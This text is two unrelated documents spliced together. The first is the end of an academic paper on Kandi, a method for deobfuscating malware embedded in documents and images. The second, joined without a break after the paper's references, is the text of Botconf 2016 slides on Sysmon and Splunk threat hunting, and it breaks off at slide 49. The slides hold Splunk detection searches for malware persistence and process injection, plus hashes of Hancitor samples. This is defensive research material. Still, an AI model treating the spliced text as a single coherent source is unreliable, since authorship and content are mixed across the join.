use keys of 1 to 8 bytes. The reasons for this assumption is that such keys fit into
CPU registers and therefore implementations are more compact. Furthermore,
4-byte keys are already intractable for brute-force attacks.
14 Deobfuscating Embedded Malware using Probable-Plaintext Attacks
0 2 4 6 8 10 12 14 16
Key length020406080100 Deobfuscation rate in percentKandi (r = 1.0)
(a) Obfuscated PE files
4 5 6 7 8
Key length405060708090100 Deobfuscation rate in percentr = 0.0
r = 0.5
r = 1.0 (b) Influence of the overlap ratio
Fig. 7. Deobfuscation performance of Kandi on Word documents containing obfus-
cated PE files. Figure (b) shows the performance for different overlap ratios.
4.2 Real-World Experiments
To top off our evaluation we proceed to demonstrate how Kandi is able to
deobfuscate and extract malware from samples seen in the wild. To this end, we
have acquired four datasets of real-world malware embedded in documents and
images with different characteristics.
Table 2. Overview of the four datasets of malicious documents and images.
Dataset name Type Formats Samples
Exploits 1 Documents DOC, PPT, RTF 992
Exploits 2 Documents DOC, PPT, RTF 237
Dropper 1 Documents DOC, PPT, RTF 336
Dropper 2 Images PNG, GIF, JPG, BMP 52
Total 1,617
Malware Datasets. Embedded malware is typically executed by exploiting
vulnerabilities in document viewers. For the first dataset ( Exploits 1 ) we thus
retrieve all available Word, Powerpoint and RTF documents from VirusTotal
that are detected by an anti-virus scanner and whose label indicates the presence
of an exploit, such as exploit.msword orexploit.ole2 . Similarly, we construct
the second dataset ( Exploits 2 ) by downloading all documents that are tagged
with one of the following CVE numbers: 2003-0820 ,2006-2492 ,2010-3333 ,
2011-0611 ,2012-0158 and2013-0634 .
As our method specifically targets PE files embedded in documents, we ad-
ditionally compose two datasets of malware droppers. The first set ( Dropper 1 )
contains all available Word, Powerpoint and RTF documents that are detected
by an anti-virus scanner and whose label contains the term dropper . The second
dataset ( Dropper 2 ) is constructed similarly by retrieving all malicious images
Deobfuscating Embedded Malware using Probable-Plaintext Attacks 15
labeled as dropper. An overview of all four datasets is given in Table 3. We
deliberately exclude malicious PDF files from our analysis, as this file format al-
lows to incorporate JavaScript code. Consequently, the first layer of obfuscation
is often realized using JavaScript encoding functions, such as Base64 and URI
encoding. Such encodings are not available natively for other formats and hence
we do not consider PDF files in this work.
Table 3. Deobfuscation performance of Kandi on real-world malware. The last
columns detail the number of samples that were successfully deobfuscated.
Dataset Not Obfuscated Obfuscated Deobfuscated by Kandi
Exploits 1 211 781 180 23.1%
Exploits 2 35 203 64 31.7%
Dropper 1 86 250 81 32.4%
Dropper 2 27 25 9 36.0%
Total 359 1,258 334 26.6%
Deobfuscation of Embedded Malware. We proceed to apply Kandi to the
collected embedded malware. Due to minor modifications by the malware author,
it is not always possible to extract a valid PE file. To verify if a deobfuscation
attempt was successful we thus utilize a PE checker based on strings such as
Windows API function (e.g. LoadLibrary ,GetProcAddress ,GetModuleHandle )
and library names as found in the import table (e.g. kernel32.dll ,user32.dll )
Additionally, we look for the MZ and PE header signatures and the DOS stub.
We consider a deobfuscation successful if either a valid PE file is extracted or at
least five function or library names are revealed in the document.
We observe that for 359 of the samples no deobfuscation is necessary, as
the embedded malware is present in clear. Kandi identifies such malware by
simply returning an obfuscation key of 0x00 . We support this finding by applying
the PE checker described earlier. The remaining 1,258 samples are assumed
to be obfuscated. Every fourth of those samples contains malware obfuscated
with the Vigen` ere cipher and is deobfuscated by Kandi . That is, our method
automatically cracks the obfuscation of 334 samples and extracts the embedded
malware—possibly multiple files per sample. Table 3 details the results for the
individual datasets. A manual analysis of the remaining files on a sample basis
does not reveal obvious indicators for the Vigen` ere cipher and we conclude that
Kandi deobfuscates most variants used in real-world embedded malware.
Figure 8(a) shows the distribution of the key lengths discovered by Kandi .
The majority of samples is obfuscated with a single-byte key and seems to be in
reach for brute-forcing. However, to do so one would need to precisely locate the
encrypted file, which is not trivial. Moreover, our method also identifies samples
with longer keys ranging from 3 to 8 bytes that would have been missed without
the help of Kandi . Rather surprising are those samples that use 3 bytes as a
key. One would suspect these to be false positives, but we have manually verified
that these are correctly deobfuscated by our method.
16 Deobfuscating Embedded Malware using Probable-Plaintext Attacks
0 1 2 3 4 5 6 7 8
Key length050100150200250300 Number of samples
(a) Detected key lengths
012345678910111213141516171819
Number of engines0246810 Number of samples (b) VirusTotal detections
Fig. 8. (a) Distribution of key lengths detected by Kandi ; (b) Number of anti-virus
scanners detecting the extracted malware binaries.
As the final step of this experiment, we analyze the extracted malware bina-
ries with 46 different anti-virus scanners provided by VirusTotal. Since some of
these scanners are prone to errors when it comes to manipulated PE headers,
we consider only those 242 deobfuscated malware binaries that are valid PE files
(conform to the format specification). The number of detections for each of these
files is shown in Figure 8(b). Several binaries are poorly detected by the anti-
virus scanners at VirusTotal. For instance, 19% (46) of the binaries are identified
by less than 10 of the available scanners. This result suggests that the extracted
binaries are unkown to a large portion of the anti-virus companies—likely due
to the lack of tools for automatic deobfuscation.
Finally, the analyzed binaries also contain several samples of the MiniDuke
malware discovered in early February 2013 [6]. A few months back, this threat has
been completely unknown, such that we are hopeful that binaries deobfuscated
byKandi help the discovery of new and previously unknown malware.
5 Limitations
The previous evaluation demonstrates the capabilities of Kandi in automati-
cally deobfuscating embedded malware. Our approach targets a specific form of
obfuscation and thus cannot uncover arbitrarily obfuscated code in documents.
We discuss limitations resulting from this setting in the following and present
potential extensions of Kandi .
Obfuscation with Other Ciphers. Our approach builds on classic attacks
against Vigen` ere ciphers. If a different cryptographic cipher is used for the ob-
fuscation, our method obviously cannot recover the original binary. For example,
the RC4-based obfuscation used in the trojan Taidoor [28] is resistant against
probable-plaintext attacks as used for Kandi . However, the usage of standard
cryptographic primitives, such as RC4 and AES, can introduce detectable pat-
terns in native code and thereby expose the presence of embedded malware in
documents [see 4]. To stay under the radar of detection tools, attackers need to
carefully balance the strength of obfuscation and its detectability, which provides
room for further cryptographic attacks.
Deobfuscating Embedded Malware using Probable-Plaintext Attacks 17
Availability of Plaintexts. The efficacy of probable-plaintext attacks criti-
cally depends on a sufficiently large set of plaintexts. If no or very few plaintexts
are available, the obfuscation cannot be reliably broken. As a result, attackers
might try to eliminate predicable plaintexts from their code, for example, by
removing header information or avoiding common libraries. Designing malware
that does not contain predictable plaintexts is feasible but requires to expend
considerable effort. In practice, many targeted attacks therefore use multiple lay-
ers of obfuscation, where only few indicative patterns are visible at each layer.
Our evaluation demonstrates that this strategy is often insufficient, as Kandi
succeeds in breaking the obfuscation of every fourth sample we analyzed.
Other Forms of Vigen` ere-based Obfuscation. Our implementation of Kandi
is designed to deobfuscate streams of bytes as generated by native obfuscation
code. Consequently, the method cannot be directly applied to other encodings,
as for example employed in malicious PDF documents using JavaScript code.
However, with only few modifications, Kandi can be extended to also support
other streams of data, such as unicode characters (16 bit) and integers (32 bit). In
combinations with techniques for detection and normalization of common encod-
ings, such as Base64 and URI encoding, Kandi might thus also help in breaking
Vigen` ere-based obfuscations in PDF documents and drive-by-download attacks.
However, extending the Vigen` ere cipher by, for instance, introducing chaining
defines a different (although related) obfuscation and cannot be handled with
the current implemention of Kandi . We leave this to future work.
6 Related Work
The analysis of embedded malware has been a vivid area of research in the
last years, in particular due to the increasing usage of malicious documents
in targeted attacks [e.g., 1, 6, 28]. Several concepts and techniques have been
proposed to locate and examine malicious code in documents. Our approach is
related to several of these, as we discuss in the following.
Analysis of Embedded Malware. First methods for the identification of
malware in documents have been proposed by Stolfo et al. [27] and Li et al. [15].
Both make use of content-based anomaly detection for learning profiles of regular
documents and detecting malicious content as deviation thereof. This work has
been further extended by Shafiq et al. [21], which refine the static analysis of doc-
uments to also locate the regions likely containing malware. Although effective
in spotting suspicious content, these methods are not designed to deobfuscate
code and thus are unsuitable for in-depth analysis of embedded malware.
Another branch of research has thus studied methods for analyzing mali-
cious documents at runtime, thereby avoiding the direct deobfuscation of em-
bedded code [e.g., 8, 15, 20]. For this dynamic analysis, the documents under
investigation are opened in a sandbox environment, such that the behavior of
the application processing the documents can be monitored and malicious ac-
tivities detected. These approaches are not obstructed by obfuscation and can
18 Deobfuscating Embedded Malware using Probable-Plaintext Attacks
reliably detect malicious code in documents. The monitoring at run-time, how-
ever, induces a significant overhead which is prohibitive for large-scale analysis
or detection of malware at end hosts.
Recently, a large body of work has focused on malicious PDF documents.
Due to the flexibility of this format and its support for JavaScript code, these
documents are frequently used as vehicles to transport malware [25]. Several con-
trasting methods have been proposed to spot attacks and malware in JavaScript
code [e.g., 5, 13] and the structure of PDF files [e.g., 23, 29]. While some ma-
licious PDF documents make use of Vigen` ere-based obfuscation, other hiding
strategies are more prominent in the wild, most notably the dynamic construc-
tion of code. As a consequence, we have not considered PDF documents in this
work, yet the proposed deobfuscation techniques also apply to Vigen` ere ciphers
used in this document format.
Deobfuscating and Unpacking Malware. Aside from specific work on em-
bedded malware, the deobfuscation of malicious code has been a long-standing
topic of security research. In particular, several methods have been developed
to dynamically unpack malware binaries, such as PolyUnpack [18], OmniUn-
pack [17] and Ether [7]. These methods proceed by monitoring the usage of
memory and identifying unpacked code created at runtime. A similar approach
is devised by Sharif et al. [22], which defeats emulation-based packers using
dynamic taint analysis. These unpackers enable a generic deobfuscation of mali-
cious code, yet they operate at runtime and, similar to the analysis of documents
in a sandbox, suffer from a runtime overhead.
Due to the inherent limitations of static analysis, only few approaches have
been proposed that are able to statically inspect obfuscated malware. An exam-
ple is the method by Jacob et al. [11] that, similar to Kandi , exploits statistical
artifacts preserved through packing in order to analyze malware. The method
does not focus on deobfuscation but rather efficiently comparing malware bina-
ries and determining variants of the same family without dynamic analysis.
Probable-Plaintext Attacks. Attacks using probable and known plaintexts
are among the oldest methods of cryptography. The Kasiski examination used
inKandi dates back to 1863 [12] and similarly the key elimination of Vigen` ere
ciphers is an ancient approach of cryptanalysis [see 19]. Given this long history
of research and the presence of several strong cryptographic methods, it would
seem that attacks against weak ciphers are largely irrelevant today. Unfortu-
nately, these weak ciphers regularly slip into implementations of software and
thus probable-plaintext attacks based on classic techniques are still successful,
as for instance in the cases of WordPerfect [2] and PKZIP [24].
To the best of our knowledge, Kandi is the first method that applies these
classic attacks against obfuscation used in embedded malware. While some high-
profile attack campaigns have already moved to stronger ciphers, such as RC4
or TEA, the convenience of simple cryptography and the risk of introducing
detectable patterns with involved approaches continues to motivate attackers to
use weak ciphers for obfuscation.
Deobfuscating Embedded Malware using Probable-Plaintext Attacks 19
7 Conclusion
Malicious documents are a popular infection vector for targeted attacks. For this
purpose, malware binaries are embedded in benign documents and executed by
exploiting vulnerabilities in the program opening them. To limit the chances
of being detected by anti-virus scanners, these embedded binaries are usually
obfuscated. In practice this obfuscation is surprisingly often realized as sim-
ple Vigen` ere cipher. In this paper, we propose Kandi , a method that exploits
well-known weaknesses of these ciphers and is capable of efficiently decrypting
Vigen` ere-based obfuscation. Empirically, we can demonstrate the efficacy of this
approach on real malware, where our method is able to uncover the code of every
fourth malware in popular document and image formats.
While our approach targets only one of many possible obfuscation strategies,
it helps to strengthen current defenses against embedded malware. Our method
is fast enough to be applied on end hosts and thereby enables regular anti-virus
scanners to directly inspect deobfuscated code and to better identify some types
of embedded malware. Moreover, by statically exposing details of the obfusca-
tion, such as the key and the operations used, our method can also be applied
for the large-scale analysis of malicious documents and is complementary to
time-consuming dynamic approaches.
Acknowledgments The authors would like to thank Emiliano Martinez and
Stefano Zanero for support with the acquisition of malicious documents. The
authors gratefully acknowledge funding from the German Federal Ministry of
Education and Research (BMBF) under the project PROSEC (FKZ 01BY1145).
References
1. Bencs ́ ath, B., G. P ́ ek, L.B., Felegyhazi, M.: Duqu: Analysis, detection, and lessons
learned. In: European Workshop on System Security (EUROSEC) (2012)
2. Bergen, H.A., Caelli, W.J.: File security in WordPerfect 5.0. Cryptologia 15(1),
57–66 (1991)
3. Boldewin, F.: OfficeMalScanner. http://www.reconstructer.org/code.html
4. Calvet, J., Fernandez, J.M., Marion, J.Y.: Aligot: Cryptographic function iden-
tification in obfuscated binary programs. In: ACM Conference on Computer and
Communications Security (CCS). pp. 169–182 (2012)
5. Cova, M., Kruegel, C., Vigna, G.: Detection and analysis of drive-by-download at-
tacks and malicious JavaScript code. In: International World Wide Web Conference
(WWW). pp. 281–290 (2010)
6. CrySyS Malware Intelligence Team: Miniduke: Indicators. Budapest University of
Technology and Economics (February 2013)
7. Dinaburg, A., Royal, P., Sharif, M., Lee, W.: Ether: Malware analysis via hardware
virtualization extensions. In: ACM Conference on Computer and Communications
Security (CCS). pp. 51–62 (2008)
8. Engelberth, M., Willems, C., Holz, T.: MalOffice: Detecting malicious documents
with combined static and dynamic analysis. In: Virus Bulletin Conference (2009)
9. Friedman, W.: The index of coincidence and its applications in cryptology. Tech.
rep., Riverbank Laboratories, Department of Ciphers (1922)
20 Deobfuscating Embedded Malware using Probable-Plaintext Attacks
10. Friedman, W., Callimahos, L.: Military Cryptanalytics. Aegean Park Press (1985)
11. Jacob, G., Comparetti, P.M., Neugschwandtner, M., Kruegel, C., Vigna, G.: A
static, packer-agnostic filter to detect similar malware samples. In: Flegel, U.,
Markatos, E., Robertson, W. (eds.) Detection of Intrusions and Malware & Vul-
nerability Assessment (DIMVA). LNCS, vol. 7591, pp. 102–122. Springer Berlin
Heidelberg (2012)
12. Kasiski, F.W.: Die Geheimschriften und die Dechiffrir-Kunst. E. S. Mittler und
Sohn (1863)
13. Laskov, P., ˇSrndi ́ c, N.: Static detection of malicious JavaScript-bearing PDF doc-
uments. In: Annual Computer Security Applications Conference (ACSAC). pp.
373–382 (2011)
14. Lewand, R.: Cryptological mathematics. Classroom Resource Materials, The Math-
ematical Association of America (2000)
15. Li, W.J., Stolfo, S., Stavrou, A., Androulaki, E., Keromytis, A.D.: A study of
malcode-bearing documents. In: H ̈ ammerli, B., Sommer, R. (eds.) Detection of
Intrusions and Malware & Vulnerability Assessment (DIMVA). LNCS, vol. 4579,
pp. 231–250. Springer Berlin Heidelberg (2007)
16. Malware Tracker Ltd.: Cryptam. http://www.cryptam.com (visited June, 2013)
17. Martignoni, L., Christodeorescu, M., Jha, S.: OmniUnpack: Fast, generic, and safe
unpacking of malware. In: Annual Computer Security Applications Conference
(ACSAC). pp. 431–441 (2007)
18. Royal, P., Halpin, M., Dagon, D., Edmonds, R., Lee, W.: PolyUnpack: Automating
the hidden-code extraction of unpack-executing malware. In: Annual Computer
Security Applications Conference (ACSAC). pp. 289–300 (2006)
19. Schneier, B.: Applied Cryptography. John Wiley and Sons (1996)
20. Schreck, T., Berger, S., G ̈ obel, J.: BISSAM: Automatic vulnerability identification
of office documents. In: Flegel, U., Markatos, E., Robertson, W. (eds.) Detection of
Intrusions and Malware & Vulnerability Assessment (DIMVA). LNCS, vol. 7591,
pp. 204–213. Springer Berlin Heidelberg (2012)
21. Shafiq, M.Z., Khayam, S., Farooq, M.: Embedded malware detection using markov
n-grams. In: Zamboni, D. (ed.) Detection of Intrusions and Malware & Vulnerabil-
ity Assessment (DIMVA). LNCS, vol. 5137, pp. 88–107. Springer Berlin Heidelberg
(2008)
22. Sharif, M., Lanzi, A., Giffin, J., Lee, W.: Automatic reverse engineering of malware
emulators. In: IEEE Symposium on Security and Privacy. pp. 94–109 (2009)
23. Smutz, C., Stavrou, A.: Malicious PDF detection using metadata and structural
features. In: Annual Computer Security Applications Conference (ACSAC). pp.
239–248 (2012)
24. Stay, M.: ZIP attacks with reduced known plaintext. In: Matsui, M. (ed.) Fast
Software Encryption (FSE). pp. 125–134. Springer Berlin Heidelberg (2002)
25. Stevens, D.: Malicious PDF documents explained. IEEE Security & Privacy 9(1),
80–82 (2011)
26. Stevens, D.: XORSearch. http://blog.didierstevens.com/programs/
xorsearch/ (visited June, 2013)
27. Stolfo, S., Wang, K., Li, W.J.: Towards stealthy malware detection. In: Christodor-
escu, M., Jha, S., Maughan, D., Song, D., Wang, C. (eds.) Malware Detection,
Advances in Information Security, vol. 27, pp. 231–249. Springer US (2007)
28. The Taidoor campaign: An in-depth analysis. Trend Micro Incorporated (2012)
29.ˇSrndi ́ c, N., Laskov, P.: Detection of malicious PDF files based on hierarchical docu-
ment structure. In: Network and Distributed System Security Symposium (NDSS)
(2013)Advanced Incident Detection and 
Threat Hunting using Sysmon   
(and Splunk ) 
Tom Ueltschi, Swiss Post CERT  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 1 

 
Tom Ueltschi  
Swiss Post CERT / SOC / CSIRT, since  2007  
–Focus: Malware Analysis, Threat  Intel, Threat  Hunting , Red  Teaming  
Talks about  «Ponmocup  Hunter» ( Botconf , DeepSec , SANS DFIR Summit ) 
Member of many  trust  groups  / infosec  communities  
Twitter: @ c_APT_ure  
 
 
 Seite 2 C:\> whoami  /all 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
 
Views & opinions  expressed  are my own  
Work presented  is from  $dayjob  
–past  6-8 months , ongoing  
–examples , ideas , process , methodology  
–not a finished  «solution » or «product » 
–approach  for others  (analysts ) to adopt  
Fast paced  talk ahead  – fasten your  seat  belts !  
  Seite 3 Disclaimer  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
 
Introduction  on Sysmon  
How  dou  you know  «Evil»? (malicious ) 
Searching  for «known  bad» 
Threat  Hunting  approaches  
 
 Seite 4 Outline (v0.1)  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
 
Introduction  on Sysmon  
Sources  for «knowing  Evil» 
–Searching  for «known  bad» 
–OSINT, blogs , reports , public  sandboxes , VT 
–Malware Analysis of self discovered  samples  
–Threat  Hunting  approaches  
–Red /Purple  Teaming  / Adversary  Simulation  
  Seite 5 Outline (v1.0)  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
 
This presentation will give an overview and 
detailed examples on how to use the free 
Sysinternals  tool SYSMON to greatly improve 
host -based incident detection and enable threat 
hunting approaches . 
The main goal is to share an approach, a 
methodology how to greatly improve host -
based detection by using Sysmon  and Splunk to 
create alerts.  
 Seite 6 Goal of Talk (Abstract)  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
 Seite 7 Introduction  on Sysmon  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  

 
    This talk is about  Host -based  Detection  Network -based  Host -based  
Prevention  Firewalls  
Network IPS  
BDS, Web -Proxy + AV/Mail -GW + AV  Antivirus  
HIPS, EMET  
Next -Gen Endpoint  Protection  
Detection  Network IDS (Snort , Surricata , Bro) 
NSM  
BDS  EDR (Carbon -Black et.al.)  
HIDS (?)  
Sysmon  and SIEM  (Splunk)  
 Seite 8 Setting the stage ... 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
 
Network -based  Detection  (NBD)  
–Intrusion Detection  System (IDS) / Network Security Monitoring (NSM)  
–Snort , Surricata  , Bro, Security Onion  ... 
Host -based  Detection  (HBD)  
–Endpoint  Detection  and Response (EDR)  
–Carbon Black, FireEye  HX, CrowdStrike  Falcon, Tanium , RSA ECAT ...  
–Sysmon  (FREE) & Splunk  (or any other  SIEM)  
Open for discussion  
–Is one of {NBD, HBD} enough , better , or are both  needed ? 
 Seite 9 Network - or Host -based  Detection ? 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
 Seite 10 Bro : NBD :: Sysmon+Splunk  : HBD  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  

 Seite 11 Bro : NBD :: Sysmon+Splunk  : HBD  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
Sysmon  / Event Logs  
Data sent  to SIEM  Splunk>  
Query Language  Splunk searches , 
Alerts , Hunting  
 Seite 12 Pyramid  of Pain  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
I want  to be able  
to detect  this! 
 Seite 13 Cyber  Kill Chain  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
I want  to be able  
to detect  this! The only  mention  
of «Cyber » 
 Seite 14 Pyramid  of Pain  & Kill Chain  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  

 
Incredible  visibility  into  system  activity  on Windows hosts  (it’s FREE)  
Store Sysmon  data  in Windows event  logs  (big size) 
–Search or query  Sysmon  data  using  Powershell  or event  viewer  
Collect  Sysmon  logs  into  SIEM for searching , alerting , hunting  (big plus)  
Analyst needs  to ... 
–know  what  to search  for 
–distinguish  normal / abnormal activity  
–find suspicious  / malicious  behavior  
 
 Seite 15 Why  using  Sysmon ? 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 16 Why  Sysmon ? RSA Con  Talk M.R.  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 17 Why  Sysmon ? RSA Con  Talk M.R.  
DLL / Proc  
Injection  Time 
stomping  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 18 Why  Sysmon ? RSA Con  Talk M.R.  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 19 Why  Sysmon ? RSA Con  Talk M.R.  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 20 Why  Sysmon ? RSA Con  Talk M.R.  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 21 Why  Sysmon ? RSA Con  Talk M.R.  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 22 Why  Sysmon ? RSA Con  Talk M.R.  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 23 Why  Sysmon ? RSA Con  Talk M.R.  

Windows Host  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 24 Sysmon  / Splunk Deployment  
Sysmon  
Windows Event Log  Splunk 
Forwarder  
Sysmon -config.xml  Windows \local \inputs.conf  

 Seite 25 How dou  you know «Evil»?  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  

 Seite 26 Source: OSINT / public sources  
Botconf  2016 | Advanced Incident Detection and Threat Hunting using Sysmon  and Splunk | Tom Ueltschi | TLP -WHITE  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 27 How  do you know  Evil? (DFIR Poster)  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 28 
How  do you know  Evil? (DFIR Poster)  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 29 
How  do you know  Evil? (DFIR Poster)  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 30 
How  do you know  Evil? (DFIR Poster)  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 31 Advanced  Detection  (ab-normal svchost.exe)  
 
alert_sysmon_suspicious_svchost  
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon"  
    EventCode =1 svchost.exe  
| search Image="* \\svchost.exe *"  
    CommandLine !="* -k *" OR  
    (Image!=" C:\\Windows\\System32 \\svchost.exe"  
     Image!="C:\\Windows\\SysWOW64 \\svchost.exe") OR  
    ParentImage !="C:\\Windows\\system32 \\services.exe "  
 
Search for «svchost.exe» process  created  
Without  « -k » parameter  
Parent process  is not «services.exe»  
Running  under  wrong  path  
(extra: whitelist  for known  good  Hashes  or IMPHASH -es) 
 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 32 How  do you know  Evil? (OSINT)  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 33 
How  do you know  Evil? (OSINT)  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 34 
How  do you know  Evil? (OSINT)  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 35 
How  do you know  Evil? (OSINT)  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 36 
How  do you know  Evil? (OSINT)  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 37 
How  do you know  Evil? (OSINT)  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 38 
Advanced  Detection  (Adwind  RAT)  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 39 Advanced  Detection  (Adwind  RAT)  
alert_sysmon_java -malware-infection  
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon" EventCode ="1"  
  (Users AppData Roaming (javaw.exe OR xcopy.exe)) OR ( cmd cscript vbs) 
| search Image="* \\AppData\\Roaming\\Oracle\\bin\\java*.exe*"  
  OR (Image="* \\xcopy.exe *" CommandLine ="*\\AppData\\Roaming\\Oracle\\*") 
  OR CommandLine ="*cscript*Retrive*.vbs*" 
 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 40 Advanced  Detection  (Adwind  RAT)  
alert_sysmon_persistence_reg_add  
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon" EventCode ="1"  
    reg.exe add CurrentVersion  
| search  
    Image="*\\reg.exe"  
    CommandLine ="* add *" CommandLine ="*CurrentVersion \\Run*" 
 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 41 How  do you know  Evil? (OSINT)  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 42 How  do you know  Evil? (OSINT)  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 43 How  do you know  Evil? (OSINT)  
First submission : 
2016 -10-26 
Same sample as 
on ISC SANS blog  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 44 Advanced  Detection  (Hancitor ) 
 
Hancitor  samples  using  process  injection  (hollowing ) 
 
PROC: Office spawns explorer.exe for process injection  
 
aca3daf2d346dc9f1d877f53cfa93e6e  irs_scanned__899383.doc  (2016-10-20) 
b41f2365f8a44305bdc0e485100b3a0c  swisssign.com_irs_subpoena.doc  (2016-10-24) 
5d3a733a05ee7e016ce9bd1789dfb993  statement_post.ch_83780.doc  (2016-10-25) 
b107f3235057bb2b06283030be8f26e4  billing_doc_83343.doc  (2016-10-26) 
55f5f681aad3f63b575d69703c53c8b1  subpoena_epaynet.com.doc  (2016-10-31) 
88d60c264a9c3426c081a2cb56e3a879  order_631085.doc  (2016-11-07) 
9d54e3bf831a159032ad86bbf0413a30  contract_154727.doc  (2016-11-10) 
 
 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 45 Advanced  Detection  (Hancitor ) 

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 46 Advanced  Detection  (Hancitor ) 
alert_office_spawn_system_process  
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon" EventCode ="1"  
    explorer.exe OR svchost.exe  
| search (Image="* \\explorer.exe " OR Image="* \\svchost.exe ") 
    (ParentImage ="*\\winword.exe " OR ParentImage ="*\\excel.exe ") 
 
 Some  false  hits from  «excel.exe» (needs  tuning ) 

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 47 Advanced  Detection  (Hancitor ) 
alert_office_process_injection  
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon" EventCode ="8"  
    explorer.exe OR svchost.exe  
| search  
    (TargetImage ="*\\explorer.exe " OR TargetImage  ="*\\svchost.exe ") 
    (SourceImage ="*\\winword.exe " OR SourceImage ="*\\excel.exe ") 
 
 No false  hits from  process  injection  

 Seite 48 Source: Malware Analysis (own samples)  
Botconf  2016 | Advanced Incident Detection and Threat Hunting using Sysmon  and Splunk | Tom Ueltschi | TLP -WHITE  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 49 Automating  Malware Analysis  
Input:  
Email w/ attach (s) 
